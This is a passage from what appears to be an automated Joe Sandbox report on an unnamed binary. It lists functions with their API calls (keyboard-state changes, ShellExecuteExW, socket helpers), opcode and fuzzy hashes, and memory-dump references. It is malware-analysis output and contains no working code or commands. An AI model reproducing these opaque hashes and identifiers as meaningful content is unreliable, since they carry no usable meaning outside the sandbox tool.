                                                                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                                                                  • Opcode ID: f3c996979ca9d9f6f61c962cd76507b6169dfbda936e049eb4e2852f2dfe980e
                                                                                                                                                                  • Instruction ID: f40d56b30b5392e38b58c2a1b827ce7bcef7de23082e0ea2ff622baf697c9fcb
                                                                                                                                                                  • Opcode Fuzzy Hash: f3c996979ca9d9f6f61c962cd76507b6169dfbda936e049eb4e2852f2dfe980e
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C0162F290420CBFE711A7E4EC8DEEA776CDB04304F404492F70AE2041EAB49E948B75
                                                                                                                                                                  Function 00239AC3 Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1718709218-0
                                                                                                                                                                  • Opcode ID: 2beb1b880589d9d6f38ff1031556bbad3917019e8e8139c5fa5fd0d54046f735
                                                                                                                                                                  • Instruction ID: 7f21b41ae7ca5fd5a905357be5b8203ad33d1a5fe4b3e45c2ea64fa8388d82b4
                                                                                                                                                                  • Opcode Fuzzy Hash: 2beb1b880589d9d6f38ff1031556bbad3917019e8e8139c5fa5fd0d54046f735
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D711CB2518245AFC710EF24CC45E6FB7E8EF99710F204A2DF556872A1DBB0D914CB92
                                                                                                                                                                  Function 0020B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __mtinitlocknum.LIBCMT ref: 0020B744
                                                                                                                                                                    • Part of subcall function 00208A0C: __FF_MSGBANNER.LIBCMT ref: 00208A21
                                                                                                                                                                    • Part of subcall function 00208A0C: __NMSG_WRITE.LIBCMT ref: 00208A28
                                                                                                                                                                    • Part of subcall function 00208A0C: __malloc_crt.LIBCMT ref: 00208A48
                                                                                                                                                                  • __lock.LIBCMT ref: 0020B757
                                                                                                                                                                  • __lock.LIBCMT ref: 0020B7A3
                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00296948,00000018,00216C2B,?,00000000,00000109), ref: 0020B7BF
                                                                                                                                                                  • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0020B7DC
                                                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0020B7EC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1422805418-0
                                                                                                                                                                  • Opcode ID: 8ecc46214db1a938433a89bf252ca47790d94e635811bce4e987fbf2148f303a
                                                                                                                                                                  • Instruction ID: b88017080c2be1f3475bf42fc8b4dcb768772337e6b06acf766615ba488ebb66
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ecc46214db1a938433a89bf252ca47790d94e635811bce4e987fbf2148f303a
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A411671D203168BEB219F68E888759F7B4AF41725F148218E425AB2E3CBB49820CF90
                                                                                                                                                                  Function 0022A1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0022A1CE
                                                                                                                                                                    • Part of subcall function 0020010A: std::exception::exception.LIBCMT ref: 0020013E
                                                                                                                                                                    • Part of subcall function 0020010A: __CxxThrowException@8.LIBCMT ref: 00200153
                                                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0022A205
                                                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 0022A221
                                                                                                                                                                  • _memmove.LIBCMT ref: 0022A26F
                                                                                                                                                                  • _memmove.LIBCMT ref: 0022A28C
                                                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 0022A29B
                                                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0022A2B0
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0022A2CF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 256516436-0
                                                                                                                                                                  • Opcode ID: df17a2bc852eb3b6ab92dce7ce34d2a207ec8c3946158ce3464797cffcdebfd7
                                                                                                                                                                  • Instruction ID: 8b21d1bc8c233a2033617b06bca7d1245c40328678197761306c827c23577d9e
                                                                                                                                                                  • Opcode Fuzzy Hash: df17a2bc852eb3b6ab92dce7ce34d2a207ec8c3946158ce3464797cffcdebfd7
                                                                                                                                                                  • Instruction Fuzzy Hash: 78316131A00215EBDB00DFA4EC89EAEB7B8EF45710F1481A5FD04AB256D7B0D925DB61
                                                                                                                                                                  Function 00248CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00248CF3
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00248CFB
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00248D06
                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00248D12
                                                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00248D4E
                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00248D5F
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0024BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00248D99
                                                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00248DB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                                                  • Opcode ID: d9ec264bbbd4ba9b5cf6fde13d968b71ad987f6edb4bfa610f5ef773a83d8e87
                                                                                                                                                                  • Instruction ID: 037941f3cb96356eb330888d1308359c821b98fca8fd4d6913aec7cc512a43cf
                                                                                                                                                                  • Opcode Fuzzy Hash: d9ec264bbbd4ba9b5cf6fde13d968b71ad987f6edb4bfa610f5ef773a83d8e87
                                                                                                                                                                  • Instruction Fuzzy Hash: C1319C72611214BFEB148F60EC8AFEA3BADEF49715F048055FE09DA191CAB59841CBB0
                                                                                                                                                                  Function 0022C890 Relevance: 10.8, APIs: 7, Instructions: 316COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0022C6A0: __time64.LIBCMT ref: 0022C6AA
                                                                                                                                                                    • Part of subcall function 001E41A7: _fseek.LIBCMT ref: 001E41BF
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 0022C96F
                                                                                                                                                                    • Part of subcall function 0020297D: __wsplitpath_helper.LIBCMT ref: 002029BD
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 0022C982
                                                                                                                                                                  • _wcscat.LIBCMT ref: 0022C995
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 0022C9BA
                                                                                                                                                                  • _wcscat.LIBCMT ref: 0022C9D0
                                                                                                                                                                  • _wcscat.LIBCMT ref: 0022C9E3
                                                                                                                                                                    • Part of subcall function 0022C6E4: _memmove.LIBCMT ref: 0022C71D
                                                                                                                                                                    • Part of subcall function 0022C6E4: _memmove.LIBCMT ref: 0022C72C
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0022C92A
                                                                                                                                                                    • Part of subcall function 0022CE59: _wcscmp.LIBCMT ref: 0022CF49
                                                                                                                                                                    • Part of subcall function 0022CE59: _wcscmp.LIBCMT ref: 0022CF5C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscat_wcscmp$__wsplitpath_memmove$__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1017551523-0
                                                                                                                                                                  • Opcode ID: 2613d7e361d11c55def92b208340b5c015c384a51a400da153606ad935db58f3
                                                                                                                                                                  • Instruction ID: e92aac270c37888540bd0b98440dd220a2e7a647b56e7c2dbbf99f68aab9ac82
                                                                                                                                                                  • Opcode Fuzzy Hash: 2613d7e361d11c55def92b208340b5c015c384a51a400da153606ad935db58f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 7FC14BB1D10229AECF10DF95DC81EEEB7BDAF59310F1040AAF609E6151DB709A94CF61
                                                                                                                                                                  Function 00231BFA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                    • Part of subcall function 001E3BCF: _wcscpy.LIBCMT ref: 001E3BF2
                                                                                                                                                                  • _wcstok.LIBCMT ref: 00231D6E
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 00231DFD
                                                                                                                                                                  • _memset.LIBCMT ref: 00231E30
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                  • String ID: X$t:)p:)
                                                                                                                                                                  • API String ID: 774024439-1306594196
                                                                                                                                                                  • Opcode ID: c796c94bdd4bb7e384ca4d289588fbf2efe78229651453d1f5139065bfdd4d8f
                                                                                                                                                                  • Instruction ID: 264e3485427f45f02261a6820d3883684e1fbbae2195d6e66e715d37eefa74af
                                                                                                                                                                  • Opcode Fuzzy Hash: c796c94bdd4bb7e384ca4d289588fbf2efe78229651453d1f5139065bfdd4d8f
                                                                                                                                                                  • Instruction Fuzzy Hash: 56C1B0716187419FC714EF24C891A6EB7E4FF95310F00492DF89A972A2EB70ED25CB92
                                                                                                                                                                  Function 001FB40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 45e1b7416df320b1b9f9079ea7cbb731f26613545892c90323d7648a182f6089
                                                                                                                                                                  • Instruction ID: ee23cf7cac660e6a06e2acd3befcfe4ab1cb497e188f8212a4fa46fdbbc33f81
                                                                                                                                                                  • Opcode Fuzzy Hash: 45e1b7416df320b1b9f9079ea7cbb731f26613545892c90323d7648a182f6089
                                                                                                                                                                  • Instruction Fuzzy Hash: 72715A7190450DEFCB04CF98CD88ABEBB78FF85314F148159FA16AA252C734AA51CFA4
                                                                                                                                                                  Function 00242121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 0024214B
                                                                                                                                                                  • _memset.LIBCMT ref: 00242214
                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00242259
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                    • Part of subcall function 001E3BCF: _wcscpy.LIBCMT ref: 001E3BF2
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00242320
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0024232F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 4082843840-2766056989
                                                                                                                                                                  • Opcode ID: 5e1ed0f991edd7e9a6cf0599880a51554a6ecb1be8385665ea04344d28510d8d
                                                                                                                                                                  • Instruction ID: 26c016616a0d7c67f71bd4e2c229e9c15f815dc160ac70d2b26027c5b5b08d6b
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e1ed0f991edd7e9a6cf0599880a51554a6ecb1be8385665ea04344d28510d8d
                                                                                                                                                                  • Instruction Fuzzy Hash: 15717E71A10619DFCB04DFA5C985AAEBBF5FF48310F108059E85AAB391DB70AD54CB90
                                                                                                                                                                  Function 002247DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32(?), ref: 0022481D
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00224832
                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00224893
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 002248C1
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 002248E0
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00224926
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00224949
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                                  • Opcode ID: 72f453844ffca95cbfe4a4226c20c9890a8bca6b26f1cf5169696a5a99fbae61
                                                                                                                                                                  • Instruction ID: 7d53634dc84cfa6d314487eeec4c02f95cdaec527acfcdfc9fbcbf1d04143166
                                                                                                                                                                  • Opcode Fuzzy Hash: 72f453844ffca95cbfe4a4226c20c9890a8bca6b26f1cf5169696a5a99fbae61
                                                                                                                                                                  • Instruction Fuzzy Hash: D65106A0A347E63DFB366BB4DC05BBB7E995B06304F088589E1D5468C2C2D8ECE4DB51
                                                                                                                                                                  Function 002245F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32(00000000), ref: 00224638
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 0022464D
                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 002246AE
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002246DA
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002246F7
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0022473B
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0022475C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                                  • Opcode ID: ec63b8496e53baf3a3773c34b9f4d06a26465996df8a48b738fb740897d2439d
                                                                                                                                                                  • Instruction ID: 392afcfb4061b47678ff5ca97c88b9ac768477b2ef9917f405b4ab292bf6fd16
                                                                                                                                                                  • Opcode Fuzzy Hash: ec63b8496e53baf3a3773c34b9f4d06a26465996df8a48b738fb740897d2439d
                                                                                                                                                                  • Instruction Fuzzy Hash: 78510BA09247E73DFB36ABA49C45B76BF995B07304F084489F1E54A8C2D3D4ECA4DB50
                                                                                                                                                                  Function 002286AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2945705084-0
                                                                                                                                                                  • Opcode ID: f65ae383305b47a7874c0f737de911fc6c67e78cbe775cc479d22224d364bd76
                                                                                                                                                                  • Instruction ID: 21b059595dfac41bfbe0eb9a45a66cf6d58c4262815cc0234a520c6db848cc7c
                                                                                                                                                                  • Opcode Fuzzy Hash: f65ae383305b47a7874c0f737de911fc6c67e78cbe775cc479d22224d364bd76
